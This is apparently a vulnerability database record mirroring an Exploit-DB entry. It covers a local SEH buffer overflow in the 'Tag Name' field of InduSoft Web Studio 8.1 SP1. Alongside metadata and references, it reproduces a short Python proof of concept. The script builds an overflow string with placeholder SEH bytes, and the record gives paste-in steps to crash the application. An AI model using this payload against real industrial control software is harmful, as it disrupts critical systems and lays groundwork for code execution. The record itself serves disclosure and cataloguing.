ID

VAR-E-201809-0024


EDB ID

45395


TITLE

InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH) - Windows_x86-64 local Exploit

Trust: 0.6

sources: EXPLOIT-DB: 45395

DESCRIPTION

InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH).. local exploit for Windows_x86-64 platform

Trust: 0.6

sources: EXPLOIT-DB: 45395

AFFECTED PRODUCTS

vendor:indusoftmodel:web studio sp1scope:eqversion:8.1

Trust: 1.6

sources: EXPLOIT-DB: 45395 // EDBNET: 99287

EXPLOIT

# Exploit Title: InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH)
# Discovery by: Luis Martinez
# Discovery Date: 2018-09-11
# Vendor Homepage: http://www.indusoft.com/
# Software Link: http://www.indusoft.com/Products-Downloads
# Tested Version: 8.1 SP1
# Vulnerability Type: Local Buffer Overflow (SEH Unicode)
# Tested on OS: Windows 10 Pro x64 en

# Steps to Produce the Local Buffer Overflow (SEH Unicode):
# 1.- Run python code: InduSoft_Web_Studio_8.1.py
# 2.- Open InduSoft_Web_Studio_8.1.txt and copy content to clipboard
# 3.- Open IWS v8.1 InduSoft Web Studio
# 4.- Home
# 5.- Paste ClipBoard on "Tag Name"

#!/usr/bin/env python

nSEH = "\x42\x42"
SEH = "\x43\x43"

buffer = "\x41" * 1042 + nSEH + SEH
f = open ("InduSoft_Web_Studio_8.1.txt", "w")
f.write(buffer)
f.close()

Trust: 1.0

sources: EXPLOIT-DB: 45395

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 45395

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 45395

TYPE

'Tag Name' Buffer Overflow (SEH)

Trust: 1.6

sources: EXPLOIT-DB: 45395 // EDBNET: 99287

TAGS

tag:Buffer Overflow

Trust: 1.0

sources: EXPLOIT-DB: 45395

CREDITS

Luis Martínez

Trust: 0.6

sources: EXPLOIT-DB: 45395

EXTERNAL IDS

db:EXPLOIT-DBid:45395

Trust: 1.6

db:EDBNETid:99287

Trust: 0.6

sources: EXPLOIT-DB: 45395 // EDBNET: 99287

REFERENCES

url:https://www.exploit-db.com/exploits/45395/

Trust: 0.6

sources: EDBNET: 99287

SOURCES

db:EXPLOIT-DBid:45395
db:EDBNETid:99287

LAST UPDATE DATE

2022-07-27T09:44:38.025000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:45395date:2018-09-13T00:00:00
db:EDBNETid:99287date:2018-09-13T00:00:00